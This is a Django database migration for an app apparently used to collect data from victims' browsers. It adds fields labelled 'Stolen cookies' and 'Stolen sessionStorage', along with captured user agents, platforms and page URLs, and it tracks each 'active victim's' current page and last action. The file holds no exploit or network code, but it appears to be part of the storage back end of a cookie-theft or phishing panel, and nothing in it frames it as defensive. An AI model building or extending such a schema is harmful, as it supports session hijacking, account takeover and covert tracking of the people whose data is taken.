# Generated by Django 6.0.4 on 2026-05-09 08:50

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('logger', '0009_threatlog_auth_mode_threatlog_full_name'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='threatlog',
            name='clipboard_data',
        ),
        migrations.AddField(
            model_name='activevictim',
            name='current_url',
            field=models.URLField(blank=True, help_text='Last known page URL', null=True),
        ),
        migrations.AddField(
            model_name='activevictim',
            name='last_action',
            field=models.CharField(blank=True, help_text='Last action by victim', max_length=50, null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='cookies',
            field=models.TextField(blank=True, help_text='Stolen cookies', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='device_type',
            field=models.CharField(choices=[('desktop', 'Desktop'), ('mobile', 'Mobile'), ('tablet', 'Tablet'), ('other', 'Other')], default='other', max_length=20),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='platform',
            field=models.CharField(blank=True, help_text='Captured platform', max_length=100, null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='session_storage_data',
            field=models.TextField(blank=True, help_text='Stolen sessionStorage', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='source_url',
            field=models.URLField(blank=True, help_text='Captured page URL', null=True),
        ),
        migrations.AddField(
            model_name='threatlog',
            name='user_agent',
            field=models.TextField(blank=True, help_text='Captured Browser User-Agent', null=True),
        ),
    ]
